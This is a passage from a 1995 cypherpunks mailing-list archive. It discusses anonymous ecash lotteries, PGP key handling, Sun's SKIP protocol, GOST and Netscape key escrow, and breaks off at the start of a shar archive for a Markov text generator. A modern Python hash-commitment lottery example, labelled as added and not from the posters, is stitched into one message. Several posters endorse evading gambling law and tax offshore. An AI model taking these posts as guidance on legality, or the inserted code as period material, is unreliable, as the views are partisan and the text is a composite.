
    my experience over the last 15 years with Sun is that they do listen 
to outside "noise" and will move forward.  I for one will be contacting 
my Catalyst rep and the software development group; the time has passed when 
you could get Andy, Bill, or Scott on the squawker.  I did complain to 
Scott about Catalyst changes --I did get a nice letter back, but I doubt 
it was authored by Scott.  Andy resigned last year, and I have not heard 
from Bill for years.

   other than the inferior method v. DH, is there anything else missing; 
I will probably pull the code package off the developers' access machine 
before the week is out just to take a look.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:30:53 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <ace26afe05021004e5e0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 AM 11/30/95, Dr. Dimitri Vulis wrote:
>iagoldbe@csclub.uwaterloo.ca (Ian Goldberg) writes:
>> So; is there a problem with the implementation outlined above?
>
>What about the income tax on winnings?

That's a good one! A bit subtle as humor, though.

(For many of us, even most of us, the whole _attraction_ of such gambling
schemes--to the extent any gambling scheme can ever be attractive to a
rational person--is the tax avoidance. And any scheme that allows taxation
of winnings, but not losses on individual bets, would kill this proposal
dead.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 14:09:44 +0800
To: attila <hallam@w3.org
Subject: Re: WTO an even worse possibility as Inet regulator
Message-ID: <199512010519.VAA12922@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 PM 11/30/95 +0000, attila wrote:
>	<attila sez>  but WTO is also accumulating a rather larger 
>    bureaucracy and is challenging Uncle Sam on several major unilateral
>    actions.  [...] and it will be by the WTOs and world courts, or the
>    Rockefeller NWO --read UN, and UN troops in America. 

This is excessively paranoid:  The main threat to freedom is still
internal, rather than external.

The major expansion of WTO power came because of the notorious
corruption and one sidedness of American courts judging disputes
between foreign and American businessmen.

Since WTO courts do not have WTO gunmen this amounts to a major
separation of judicial and executive power, thus though it is
a centralizing move, it is also a move that favors liberty and
the rule of law.

Of course the first stages in centralization always do, at first,
favor liberty and the rule of law as they restrain corrupt and
lawless local powers.  Later, much later, the centralized power
becomes a greater threat to liberty than those local authorities
that it restrained.  

That stage is still a long way down the track, and very likely 
the modern nation state will collapse first.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:42:13 +0800
To: cypherpunks@toad.com
Subject: Fertile ground for papers....
Message-ID: <ace26c630602100439cf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:22 AM 11/30/95, Pete Loshin wrote:

>In any case, using such a "public" and daily number
>eliminates the problem of proving the game isn't fixed.

Maybe.

In passing, the whole field of cryptography is filled with interesting
papers with titles like "How to toss a fair coin over the telephone" and
"Avoiding double spenders in digital money systems."

Meaning, how robust cryptographic protocols can be used to avoid scams
familiar to the most junior grifter.

The theme of "proving anonymous betting schemes are not fixed" is in the
same vein, and could establish the reputation of any budding Amos Fiats or
David Chaums out there.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 16:13:58 +0800
To: fluffy@shout.net (Chris Stillson)
Subject: Re: GOST for sale
In-Reply-To: <199511292216.QAA25781@duracef.shout.net>
Message-ID: <199511300239.VAA16572@homeport.org>
MIME-Version: 1.0
Content-Type: text


Chris Stillson wrote:

| What I wonder about is why anyone would use the Algorithm
| that the NSA is probably best at breaking.  Breaking GOST was probably
| their number one project for years, and I would suspect that they
| have done it.

	Bamford (The Puzzle Palace) suggests that no major Soviet or
American cipher has been cryptanalyzed since the early 70s or so.
Ciphers are chipped at by theft of keys by spies (The Falcon and the
Snowman) or military action (Seizing the Enigma).

	Also, you have to ask yourself, would the NSA reveal its
ability to break GOST traffic?  (I think it was Seymour Hersh who made
the claim that the Bush administration gave Yeltsin real time breaks*
of Generals plotting against him in the '92 coup attempt.  In
evaluating this claim, remember Bush ran the CIA for several years.)

	(*It also might be that the messages were not protected by
GOST, were obtained by bugging in a room, or other nefarious means, as
I'm sure the NSA would attest if it came out that messages were
actually passed.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Thu, 30 Nov 1995 23:01:10 +0800
To: cypherpunks@toad.com
Subject: Internet gambling
Message-ID: <199511300541.VAA04276@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



My favorite numbers game is "fixed".  Choose a number from 1 to 1000.
The least chosen number is the winner, and it pays off 1000:1.  This
least chosen number would have to be published in some non-repudiatable
way, but that's not too hard.  The fun thing is that you get to play with
the minds of all the other players...when would be the first time that
the same number was the winner two days in a row?  Or how many times
will 666 be the winning number?  Or whatever.  Bet all numbers, and it's
a wash.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Thu, 30 Nov 1995 16:03:52 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
In-Reply-To: <199511290507.VAA10591@jobe.shell.portal.com>
Message-ID: <49j6ot$5t1@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:

>PGP is really not the issue.  The issue is more my security and the
>environment that I use PGP in.  I don't have a trusted machine to run PGP
>on.  Anyone who wants to can come up to machine and copy my secret keyring
>or they can even watch me typing my password in. 

Oh, puh-lease.  Do you often send anonymous mail to cypherpunks with your
co-workers and friends looking over your shoulder?  So much for your
anonymity and security.  I dunno about this theory of reputation stuff,
but you've sure developed one.
-- 
Yea, the heavens shall open and the NP-complete solution given forth.
ATT executives shall give birth to two-headed operating systems, and 
copyrights shall be expunged.  The voice of the GNU shall be heard,
but the faithless will be without transcievers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 30 Nov 1995 14:13:21 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511300602.WAA13054@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

Sorry to follow up on my own post, but I made a boo boo.  A real, big
boo boo.

On Wed, 29 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> On Wed, 29 Nov 1995, Adam Shostack wrote:
> >
> > 	I don't follow.  You're claiming that PGP is good enough to
> > transfer OTPads, but not good enough to sign pseudonymous messages?
> 
> Sure. Two different situations.
> 
> If I take a message or a data tape and encrypt it with a one time pad.  
> 
> And then I send the message out to someone via Greyhound or DHL.
> 
> And once they've confirmed that they have the encrypted message safely in 
> hand, then I'll call them and ask them to call me with their public key
> delivered by voice via telephone.

Actually, I made a big mistake here.  It's not good enough for me to
call them.  Usually I have them first call me, and then I call them
back.

I learned to do this in real-estate when I had my property management
company.

Very often, someone would call the office, and say something along the
lines of "This is Constable Acheson, from the Calgary City Police.
Could you please tell me the forwarding address of your former tenant,
Alice" (or Bob, or whatever).

My standard response always was to ask for whoever identified himself
as "Constable Acheson" to provide his division.  Then I'd hang up,
check the number for the main switchboard in the phone book and then
call him.  This way, I'd be sure it was actually him, and that he was
calling from where he claimed.

You'd probably be surprised (or maybe not) how many times, there was
no such Constable.  Luckily, I just didn't give out my information to
just *anyone*.

And the same stuff applies here ... with reading and verifying the key
over the telephone.  With the phone call there should be a hangup and then
some third-party authority to confirm that the channel of communication is
*really* a valid channel. 

Sorry, about leaving that part out.  

It was a boo boo, eh?  But it's important, RL stuff.

> Which I then use to encrypt the one-time-pad, using the PGP key only once.
> 
> Then, I'm comfortable sending it (not the message, but the pad) over the 
> Internet encrypted with PGP.  And I think at that point, I have Pretty 
> Good Privacy.
> 
> > Adam
> > 
> > -- 
> > "It is seldom that liberty of any kind is lost all at once."
> 
> 
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
> 
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 

Yep, it was the real me this time ... and no, I didn't add another
"signature" encrypted or not encrypted to the bottom of this post. 

Let me ask this though??  Would the "quality" of my post have changed one way
or another, if this was signed, or not?? 

IMHO, the message should make sense (or not) either way.

                           ... Alice ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 30 Nov 1995 16:03:36 +0800
To: Pete Loshin <cypherpunks@toad.com>
Subject: Re: "Proprietary" internetworking protocols (was RE: The future will be  easy to use )
In-Reply-To: <01BABE83.A3A80240@ploshin.tiac.net>
Message-ID: <9511300318.AA02710@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Both Netscape and Sun had a product that had a large number of seats. From what I 
have seen the POTP have diddly squat in the way of seats.

Looking at the market today it is clear that there are fewer opportunities to do that 
type of roll out. Netscape and Sun were running just ahead of a market. Today I 
don't see how many people will want to abandon PGP for a product that is 
indistinguishable from smoke 'n mirrors.

	Phill
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 11:55:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: key for Alice as promised (not) (fwd)
Message-ID: <199511300318.WAA16662@homeport.org>
MIME-Version: 1.0
Content-Type: text


>On Wed, 29 Nov 1995, Adam Shostack wrote:
>
>> > PGP is really not the issue.  The issue is more my security and the
>> > environment that I use PGP in.  I don't have a trusted machine to run PGP
>> 	Threat, please??  Do people often stand over your shoulder as
>> you type?
>
>Yes.

And you can't ask them to leave, as you send anonymous messages?  Or
does your whole office know you're one of those who post to cypherpunks
as Alice d' nonymous?

>> Have you considered putting the secret keyring
>> on a floppy and locking it in your desk/safe when you're not actually
>> in the office? (Or home..)
>
>Yep, I've considered it.  It's still not all that helpful.  Cleaning 
>staff has plenty of time when I'm not around to deal with that.

	Of course, if the cleaning staff cut your safe open, you have
a good indication of that in the morning.

	Not that you've demonstrated that the level of effort to do
all of this at all equates to what is gained, namely, the ability to
impersonate you.  Which everyone in the world has today.

>> > So, I don't fool myself, and I don't use PGP, except for things like
>> > exchanging a one-time pad with someone when I've already sent the message
>> > out across another delivery mechanism, like on a floppy delivered by
>> > courier. 
>> 
>> 	I don't follow.  You're claiming that PGP is good enough to
>> transfer OTPads, but not good enough to sign pseudonymous messages?
>
>Sure. Two different situations.

[...]

>And once they've confirmed that they have the encrypted message safely in 
>hand, then I'll call them and ask them to call me with their public key
>delivered by voice via telephone.

>Which I then use to encrypt the one-time-pad, using the PGP key only once.
>
>Then, I'm comfortable sending it (not the message, but the pad) over the 
>Internet encrypted with PGP.  And I think at that point, I have Pretty 
>Good Privacy.

	Of course, then your message only has 128 bits of security,
because the Greyhound or DHL employee could be easily compromised, as
could the message in their office.  So you encrypt the pad with IDEA,
getting you IDEA level security, and think you're working with one
time pads??

	I'm flabbergasted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Thu, 30 Nov 1995 12:04:30 +0800
To: "'cypherpunks@toad.com>
Subject: RE: ecash lottery (Was: ecash casino)
Message-ID: <01BABEA9.4771C9E0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote: 
>
>Here's an off-the-cuff idea:
>
>[Disclaimer: The following post is a gedanken experiment.  It should not
>		be interpreted as condoning or encouraging anyone to break any
>		laws, no matter how stupid the laws are.]
>
>Anonymous email lotteries:
[details deleted]
>A lottery consists simply of displaying the winning number and random
>noise, whose hash was previously posted (so the participants know
>you're not cheating).

Traditional illegal numbers rackets usually use some
publicly available number so everyone knows it's all
on the up and up (I used to know what the source for
the winning numbers actually _is_, though I think it
has something to do with the stock market, e.g., the
last three digits of the number of oddlot trades, or
something else that is usually essentially random).

In any case, using such a "public" and daily number
eliminates the problem of proving the game isn't fixed.

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 30 Nov 1995 14:39:26 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <199511300621.WAA26406@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 20:38 11/29/95 -0800, Timothy C. May wrote:
>Have to be _very_ careful here. A variety of scams can be developed which
>show lots of "small" winners, but which fail to show any large winners. The
>lottery operators can make a lot of extra bucks by simply not paying off
>the large winnings, in various ways.

With complete anonymity, the scam I would think of first is giving other
nyms of myself all the big payoffs.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 14:41:57 +0800
To: Laurent Demailly <iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <199512010624.WAA16728@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 11/30/95 +0100, Laurent Demailly wrote:
>'small' questions about inet gambling
>
> + How do you complain that you didn't get your win without revealing
> your ID ?
>
> + Alternatively, How do you prevent false complaints or nasty
> concurrent trying to trash gambling co reputation ?

Gambler submits a value that contains a hash of his guess, plus
random noise, plus some random numbers resembling random noise
that if signed by the bank will become anonymous ecash (once
deblinded).

Lottery has to acknowledge payments by signing the hashed
guess.

After the drawing, if the lottery cheats, the winner can prove that 
the lottery cheated by anonymously revealing the values that when
hashed yield the number signed by the lottery.  If a disgruntled 
person makes such an allegation, then in order to prove they
did not cheat the lottery must anonymously reveal the numbers
signed by the bank.  If they reveal this, this proves they are 
fine, and also pays the gambler, because he holds the deblinding
factor which will turn those bank signed numbers into money.

Thus not only can it be carried out anonymously, but disputes
can be fought anonymously.



>
>regards
>ps: it would be easier that the game is legal so ppl can play without
>being hidden... In my current casino, most people do complain when
>there is a problem, and I think that those who don't aren't because
>its monopoly money or just they aren't paying much attention...
>
>dl
>--
>Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
>Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
>
>jihad Ortega Qaddafi Legion of Doom South Africa KGB Uzi
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com
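
An added example, not code from any poster in this thread: the hash commitment quoted in Pete Loshin's message (winning number plus random noise, hash posted beforehand) and the hashed-guess dispute check described in the message above, in Python. SHA-256, the 0..999 number range and every name are assumptions; the lottery's signature on each ticket is treated as already verified and the blinded ecash is not modelled.

```python
"""Constructed example: hash commitments for the lottery exchange in this thread.

Assumptions (not from the posts): SHA-256 as the hash, a 0..999 number
space, 16-byte noise, and every function and variable name below.
"""
import hashlib
import hmac
import secrets

NUMBER_SPACE = 1000  # assumed three-digit numbers game


def commit(number, noise):
    """Return hex SHA-256 over len(noise) || noise || number."""
    if not 0 <= number < NUMBER_SPACE:
        raise ValueError("number outside the game's range")
    # The length prefix keeps the byte encoding unambiguous.
    data = len(noise).to_bytes(2, "big") + noise + number.to_bytes(2, "big")
    return hashlib.sha256(data).hexdigest()


def opens_to(commitment, number, noise):
    """True when (number, noise) is a valid opening of the commitment."""
    try:
        return hmac.compare_digest(commit(number, noise), commitment)
    except ValueError:
        return False


def recover_without_noise(commitment):
    """Why the noise matters: with empty noise, trying all 1000 values
    recovers the committed number before the reveal."""
    for candidate in range(NUMBER_SPACE):
        if commit(candidate, b"") == commitment:
            return candidate
    return None


def adjudicate(draw_commitment, draw_opening, acknowledged, ticket_opening):
    """Settle a dispute from public data only.

    draw_commitment: hash the operator posted before tickets were sold
    draw_opening:    (number, noise) the operator revealed after the draw
    acknowledged:    ticket commitments the operator acknowledged
                     (signature check assumed done elsewhere)
    ticket_opening:  (guess, noise) revealed by the complaining player
    """
    draw_number, draw_noise = draw_opening
    if not opens_to(draw_commitment, draw_number, draw_noise):
        return "operator-opening-invalid"
    guess, noise = ticket_opening
    if not any(opens_to(c, guess, noise) for c in acknowledged):
        return "claim-not-backed-by-ticket"
    return "winner" if guess == draw_number else "loser"


def demo():
    """Run the exchange once with constructed values."""
    # Operator, before sales: choose the draw, post only its commitment.
    draw = (417, secrets.token_bytes(16))
    posted = commit(*draw)
    # Players: send only a commitment; guess and noise stay private.
    winner = (417, secrets.token_bytes(16))
    other = (100, secrets.token_bytes(16))
    acknowledged = {commit(*winner), commit(*other)}
    return {
        "honest reveal": adjudicate(posted, draw, acknowledged, winner),
        "losing ticket": adjudicate(posted, draw, acknowledged, other),
        "operator changes draw": adjudicate(
            posted, (418, draw[1]), acknowledged, winner),
        "claim without ticket": adjudicate(
            posted, draw, acknowledged, (417, b"never-sold")),
        "number leaked, no noise": recover_without_noise(commit(417, b"")),
        "number leaked, with noise": recover_without_noise(posted),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case}: {outcome}")
```
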





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 30 Nov 1995 06:55:12 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511292128.QAA03706@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129221922.23090B-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


   OK, I have not seen it (like I said, I will get it) or read ipsec.  

   However, despite the group ego, Sun _does_ listen and Sun does wish to 
be the leader. If the rest of ipsec group has a specific list, maybe it 
needs to be presented higher up the pole.

   As fun as it might be to code it, you have enough on your plate with 
pgp alone. Sun's resources for a directed course are hard to beat; this 
is just another repeat of the first go around.  SKIP obviously will not 
fly outside of Sun without industry support and if it has long term keys 
and can be compromised, it will be a tough row to hoe.  time for a little 
pressure where it counts.

   the fact Sun released source indicates they are open enough to expect 
criticism.

	attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Fri, 1 Dec 1995 00:38:16 +0800
To: "pete@loshin.com>
Subject: RE: "Proprietary" internetworking protocols (was RE: The future will be  easy to use )
Message-ID: <01BABEAC.2E90BDC0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Oops, sorry about the unfortunate juxtaposition of POTP with 
the SKIP thread. I didn't mean to imply anything more about POTP
than that they were around in Boston in case anyone wanted
to talk to them.

My comments about "proprietary" internetworking protocols
related to discussion of Sun's SKIP, not at all to POTP, whose
protocol hasn't been published and won't be published if they
don't get their patent.

I was simply observing that Perry's comment:

"...an internetworking protocol [e.g. SKIP] used by only 
one vendor gets nowhere."

is not necessarily true, and pointed to SSL and NFS as 
counter-examples.

-pl

Phill wrote:

>Both Netscape and Sun had a product that had a large number of seats. From what I 
>have seen the POTP have diddly squat in the way of seats.
>
>Looking at the market today it is clear that there are fewer opportunities to do that 
>type of roll out. Netscape and Sun were running just ahead of a market. Today I 
>don't see how many people will want to abandon PGP for a product that is 
>indistinguishable from smoke 'n mirrors.
>
>	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 1995 14:59:05 +0800
To: cypherpunks@toad.com
Subject: Netscape gives in to key escrow
Message-ID: <199511300644.WAA02011@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.cnet.com/Central/News/govt.html

	Bad. Very Bad. And I was almost starting to like Netscape.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 30 Nov 1995 15:05:13 +0800
To: Leslie Todd Masco <cypherpunks@toad.com
Subject: Re: META: Lycos & Searchable archives
Message-ID: <ace3044e0e021004a6b0@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


If you mail to an open list or post to news you are shouting through a
megaphone on a street corner. If you don't want everyone to know what you
said, use a remailer (this group above all others should do that).

        -Lance

At 9:56 PM 11/29/95, Leslie Todd Masco wrote:
>
>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos.  Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the web-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this?  My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.
>- --
>Todd Masco     | "life without caution/ the only worth living / love for a man/

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 1 Dec 1995 00:23:23 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511300354.WAA10417@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


>  And I would ask whoever DID post the PGP key under my name, to please
>  issue a revocation certificate. 
>  
>  
>  Alice de 'nonymous ...
>  
>                                    ...just another one of those...
>  
>  
>  P.S.  This post is in the public domain.
>                    C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
>  
>  


Pretender. I'm the real no-pgp Alice.



  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.
                    C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 30 Nov 1995 22:59:19 +0800
To: cypherpunks@toad.com
Subject: SKIP, NFS, SSL, etc.
Message-ID: <9511300443.AA18343@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


NFS is not a valid example of a one-vendor internetworking protocol.
In the early days of NFS Sun worked amazingly hard to get all the major
Unix players to support it.  They all but lent out engineering staff;
they hosted several 'connectathons', where everyone tested interoperability,
made the license minimal cost (if not free), etc.  And, of course, there
was nothing competing.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 23:03:33 +0800
To: sameer <sameer@c2.org>
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300250.SAA07657@infinity.c2.org>
Message-ID: <Pine.3.89.9511292329.A20600-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Deja vu?

On Wed, 29 Nov 1995, sameer wrote:

> 	I think it would be easier if the lottery owner was just in a
> safe jurisdiction. Then he wouldn't have to worry about the legality
> of it, and not worry about his anonymity. Gambling-safe jurisdictions
> *do* exist.

Wasn't www.casino.org a participant in the ecash trial run? I remember them 
having a highly entertaining disclaimer. They're somewhere in the Caribbean,
I think. Supposedly (so said the cbc news last year) some gent here in 
Ontario (where non-licensed gambling is of course illegal--the gov likes its
monopoly) set up the domain and the webpage and sold space on the "Virtual
Strip" to interested offshore governments. Since the actual casino sites
aren't in Canada (and probably offshore gov run) it is legal for the 
operators. It is illegal for us North Americans to use though.
I just checked the site and saw quite a few casino operations on the strip.
I didn't notice the ecash logo this time around (I'm doing this off lynx, 
it might only be shown in the graphical version). 

> 	There lies a problem if *playing* a game is illegal in the US, 
Which is what the casino.org page says.

> which I believe it may be. If the winners can be revealed by
> bank/lottery collusion, then in order to protect the winners the
> lottery can't collude with the bank. This may not be a problem,
> because the lottery isn't subject to US law, so there would be no way
> to force the lottery to collude with the bank to reveal the
> identities of the winners.

And no economic incentive for the lottery.
What are the regulatory hassles of setting up a gambling operation in one 
of the US states where it's legal (i.e. Nevada)?
I take it it would still be illegal for someone outside the state to 
gamble using the service.

Isn't there also some Scandinavian bank that's handling ecash? It might be
hard to explain to US tax authorities how large amounts of anon currency
are ending up in one's marktwain account. In that case it might be 
interesting for someone to set up an anon service provider along the lines
of c2.org which would allow users to run java scripts, no-questions asked
(presuming this is a legal gambling jurisdiction). Java-based casinos, 
anyone? (or just normal unix c progs, given shell access)

Of course life will be much nicer when Chaum sheds his (*ahem*) ethics
and starts licensing to offshore banks. (I take it Scandinavian taxes are 
far worse than American ones. I would think they'd be less 
drug-money-laundering paranoid than the US however. Makes you wonder how
much attention the Fincen boys are giving marktwain at the moment).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 14:59:18 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512010802.AAA09494@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 AM 12/1/95 +0600, Ed Carp wrote:
>If you want to bar access to your site from a Netscape browser, such 
>can easily be accomplished.  If memory serves, every browser, when 
>connecting to a site, exchanges certain information about the client 
>with the server.  One can gain access easily to that information.

This would not be satisfactory in itself: Ideally one would like to bring
up a page saying  "Sorry, you cannot access that page because you
are using a Netscape browser:  Click *here* for the sad tale of
Netscape."

>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Thu, 30 Nov 1995 13:25:48 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GOST for sale
Message-ID: <199511300458.XAA08306@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain


>>
>	I have non-commercial demo version of the product (370 Kb arjed 
>	distributive) and I can send it to people who will be interested in it.
>

Please, send it to me. Thanks. Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 30 Nov 1995 13:32:02 +0800
To: owner-cypherpunks@toad.com
Subject: Re:  Your faith is PGP is charming and quaint, but wrong
Message-ID: <9511300504.AA18396@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Style, for example, cannot be easily copied.

Au contraire.

Cypherpunks share code...

#! /bin/sh
# This is a shell archive.  Remove anything before this line, then feed it
# into a shell via "sh file" or similar.  To overwrite existing files,
# type "sh file -c".
# The tool that generated this appeared in the comp.sources.unix newsgroup;
# send mail to comp-sources-unix@uunet.uu.net if you want that tool.
# Contents:  Makefile PATCHLEVEL README markov3.6 markov3.l
# Wrapped by rsalz@sulphur on Thu Nov 30 00:04:29 1995
PATH=/bin:/usr/bin:/usr/ucb ; export PATH
echo If this archive is complete, you will see the following message:
echo '          "shar: End of archive."'
if test -f 'Makefile' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'Makefile'\"
else
  echo shar: Extracting \"'Makefile'\" \(53 characters\)
  sed "s/^X//" >'Makefile' <<'END_OF_FILE'
X
Xmarkov3: markov3.o
X	$(CC) -o $@ $(CFLAGS) markov3.o
END_OF_FILE
  if test 53 -ne `wc -c <'Makefile'`; then
    echo shar: \"'Makefile'\" unpacked with wrong size!
  fi
  # end of 'Makefile'
fi
if test -f 'PATCHLEVEL' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'PATCHLEVEL'\"
else
  echo shar: Extracting \"'PATCHLEVEL'\" \(2 characters\)
  sed "s/^X//" >'PATCHLEVEL' <<'END_OF_FILE'
X1
END_OF_FILE
  if test 2 -ne `wc -c <'PATCHLEVEL'`; then
    echo shar: \"'PATCHLEVEL'\" unpacked with wrong size!
  fi
  # end of 'PATCHLEVEL'
fi
if test -f 'README' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'README'\"
else
  echo shar: Extracting \"'README'\" \(2400 characters\)
  sed "s/^X//" >'README' <<'END_OF_FILE'
XThis is a cleaned-up reposting of the markov3 program.  The following
Xchanges have been made:
X
XThe null pointer dereferencing bugs have been fixed (I hope).
X
